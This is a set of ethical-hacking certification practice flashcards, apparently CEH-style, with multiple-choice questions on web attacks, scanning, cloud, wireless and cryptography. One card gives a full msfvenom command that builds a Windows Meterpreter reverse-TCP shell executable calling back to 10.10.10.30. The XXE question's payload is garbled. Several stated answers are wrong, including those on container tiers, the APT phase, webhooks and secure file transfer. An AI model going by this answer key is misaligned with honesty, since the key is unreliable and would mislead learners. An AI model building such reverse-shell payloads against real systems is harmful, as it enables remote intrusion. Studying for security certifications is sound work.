Sample Test Questions Flashcards
- Which of the following web vulnerabilities would an attacker be attempting to exploit if they delivered the following
input?
] >
XXS
SQLi
IDOR
XXE
XXE
- Which Nmap switch helps evade IDS or firewalls?
- D
- n/-R
- oN/-oX/-oG
- T
-D
- Which of the following types of SQL injection attacks extends the results returned by the original query, enabling attackers to run two or more statements if they have the same structure as the original one?
Boolean-based blind SQL injection
Error-based injection
Union SQL injection
Blind SQL injection
Union SQL injection
- Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and location tags of recently visited places. Realizing this, James, a professional hacker, targets Emily and her acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers information to perform other sophisticated attacks.
What is the tool employed by James in the above scenario?
Hootsuite
VisualRoute
Ophcrack
HULK
Hootsuite
- Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies, such as libraries and configuration files, binaries, and other resources that run independently from other processes
in the cloud environment. For the containerization of applications, he follows the five-tier container technology architecture. Currently, Abel is verifying and validating image contents, signing images, and sending them to the registries.
Which of the following tiers of the container technology architecture is Abel currently working in?
Tier-3: Registries
Tier-2: Testing and accreditation systems
Tier-1: Developer machines
Tier-4: Orchestrators
Tier-1: Developer machines
- During the enumeration phase, Lawrence performs banner grabbing to obtain information such as OS details and versions of services running. The service that he enumerated runs directly on TCP port 445.
Which of the following services is enumerated by Lawrence in this scenario?
Server Message Block (SMB)
Telnet
Remote procedure call (RPC)
Network File System (NFS)
Server Message Block (SMB)
- What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?
A msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
B. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444-f c
D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
B. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
- Keatron performed a vulnerability scan on a target organization by sniffing the traffic on the network to identify the active systems, network services, applications, and vulnerabilities. He also obtained the list of the users who are currently accessing the network.
What is the type of vulnerability assessment did Keatron perform on the target organization?
Passive assessment
Credentialed assessment
Internal assessment
External assessment
Passive assessment
- Bobby targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection. What APT lifecycle phase is currently executing?
Preparation
Cleanup
Initial intrusion
Persistence
Persistence
- At what stage of the cyber kill chain theory model does data exfiltration occur?
Actions on objectives
Weaponization
Command and control
Installation
Actions on objectives
- Jason, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and passwords are shared in plaintext, making the way for hackers to perform successful session hijacking. To address this situation, Jason implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by Jason?
FTPS
IP
FTP
HTTPS
HTTPS
- This wireless security protocol allows 192-bit minimum-strength security protocols and cryptographic tools to protect sensitive data, such as GCMP-256, HMAC-SHA384, and ECDSA using a 384-bit elliptic curve.
Which is this wireless security protocol?
WPA3-Personal
WPA2-Enterprise
WPA2-Personal
WPA3-Enterprise
WPA3-Enterprise
- What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application?
classes.dex
APK.info
resources.asrc
AndroidManifest.xml
AndroidManifest.xml
- You have been authorized to perform a penetration test against a website. You want to use Google dorks to footprint the site but only want results that show file extensions.
What Google dork operator would you use?
filetype
inurl
ext
site
filetype
- Alice, a professional hacker, targeted an organization’s cloud services. She infiltrated the target’s MSP provider by sending spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored them in the MSP. Then, she used this information to launch further attacks on the target organization.
Which of the following cloud attacks did Alice perform in the above scenario?
Cloud hopper attack
Cloudborne attack
Cloud cryptojacking
Man-in-the-cloud (MITC) attack
Cloud hopper attack
- Susan, a software developer, wants her web API to update other applications with the latest information. For this purpose, she uses a user-defined HTTP callback or push APIs that are raised based on trigger events; when invoked, this feature supplies data to other applications so that users can instantly receive real-time information.
Which of the following techniques is employed by Susan?
REST API
Webhooks
Web shells
SOAP API
REST API
- In this form of encryption algorithm, every individual block contains 64-bit data, and three keys are used, where each key consists of 56 bits. Which is this encryption algorithm?
MD5 encryption algorithm
Triple Data Encryption Standard
IDEA
AES
Triple Data Encryption Standard
- Richard, an attacker, targets an MNC. In this process, he uses a footprinting technique to gather as much information as possible. Using this technique, he gathers domain information such as the target domain name, contact details of its owner, expiry date, and creation date. With this information, he creates a map of the organization’s network and misleads domain owners with social engineering to obtain internal details of its network.
What type of footprinting technique is employed by Richard?
Email footprinting
VoIP footprinting
Whois footprinting
VPN footprinting
Whois footprinting
- An attacker redirects the victim to malicious websites by sending them a malicious link by email. The link appears authentic but redirects the victim to a malicious web page, which allows the attacker to steal the victim’s data. What type of attack is this?
Vishing
Spoofing
Phishing
DDoS
Phishing
- Robin, a professional hacker, targeted an organization’s network to sniff all the traffic. During this process, Robin plugged in a rogue switch to an unused port in the LAN with a priority lower than any other switch in the network so that he could make it a root bridge that will later allow him to sniff all the traffic in the network.
What is the attack performed by Robin in the above scenario?
ARP spoofing attack
STP attack
VLAN hopping attack
DNS poisoning attack
STP attack
- Bobby, an attacker, targeted a user and decided to hijack and intercept all their wireless communications. He installed a fake communication tower between two authentic endpoints to mislead the victim. Bobby used this virtual tower to interrupt the data transmission between the user and real tower, attempting to hijack an active session. Upon receiving the user’s request, Bobby manipulated the traffic with the virtual tower and redirected the victim to a malicious website.
What is the attack performed by Bobby in the above scenario?
Wardriving
KRACK attack
Jamming signal attack
aLTEr attack
aLTEr attack
- Dorian is sending a digitally signed email to Polly. With which key is Dorian signing this message and how is Poly validating it?
A. Dorian is signing the message with his public key, and Poly will verify that the message came from Dorian by using Dorian’s private key.
B. Dorian is signing the message with Poly’s private key, and Poly will verify that the message came from Dorian by using Dorian’s public key.
C. Dorian is signing the message with Poly’s public key, and Poly will verify that the message came from Dorian by using Dorian’s public key.
D. Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian’s public key.
D. Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian’s public key.
- Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks.
What is the component of the Docker architecture used by Annie in the above scenario?
Docker daemon
Docker client
Docker object
Docker registries
Docker daemon
- What is the common name for a vulnerability disclosure program opened by companies in platforms such as HackerOne?
White-hat hacking program
Bug bounty program
Vulnerability hunting program
Ethical hacking program
Bug bounty program